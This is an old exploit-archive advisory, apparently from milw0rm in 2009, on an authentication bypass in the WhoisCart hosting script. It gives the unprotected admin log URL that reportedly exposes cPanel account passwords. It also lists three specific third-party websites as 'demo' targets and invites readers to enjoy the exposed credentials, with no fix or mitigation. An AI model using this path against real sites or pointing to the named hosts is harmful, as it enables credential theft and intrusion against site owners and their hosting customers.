WHOISCART - Authentication Bypass / Information Disclosure
+===================================================================================+
./SEC-R1Z _ __ _ _ _ _ ___ _ _ _ _ __ _ _ _ _ _
/ /_ _ _ _ / _ _\/ _ _ /\ \< |/_ _ _ _ /
\ \_ _ _ _/ /___ / / __ | |) / | | / /
\_ _ _ _/ /___ / / | __ || / | | / /
_______\ \_ _ \ \2_0_0_9 | \ | | / /____
/_ _ _ _ _\ _ _ _/\ _ _ _ / |__|\ __\ |__|/_ _ _ _ _\
+===================================================================================+
| |
| |
| WHOISCART ADMIN BYPASS |
| |
+===================================================================================+
| |
| Author.: Black Dream |
| Contact: Be5_at_HoTMail_dot_Fr |
| HoMe : www.sec-r1z.com |
| ARAB ETHICAL HACKING, PENETRATION TESTING & WEB APPLICATION SECURITY SYSTEM |
+===================================================================================+
| |
| Script.: WHOISCART |
| Home...: http://whoiscart.net |
| |
+-----------------------------------------------------------------------------------+
| |
| Exploit: |
| |
| http://[website]/[script]/admin/hostinginterfaces/cpanel_1_log.htm |
| |
| [+] Demo |
| |
| http://www.denverwebhost.com/whoiscart/admin/hostinginterfaces/cpanel_1_log.htm |
| |
| http://www.bearmedia.net/whoiscart/admin/hostinginterfaces/cpanel_1_log.htm |
| |
| http://thevillagehost.com/whoiscart/admin/hostinginterfaces/cpanel_1_log.htm |
| |
| |
| |
| [+] Now you see all cpanel[s] accout[pwd] xD Pure admin |
| |
| [+] Enjoy xD |
+-----------------------------------------------------------------------------------|
+===================================================================================+
| |
| Greetz.: ~ j0rd4n14n.r1z ~ Linux-D3v1L ~ S4s-T3rr0rist ~ Golden-Z3r0 |
| And All #sec-r1z memb3rz!!!! |
+===================================================================================+
E0D|F
# milw0rm.com [2009-06-29]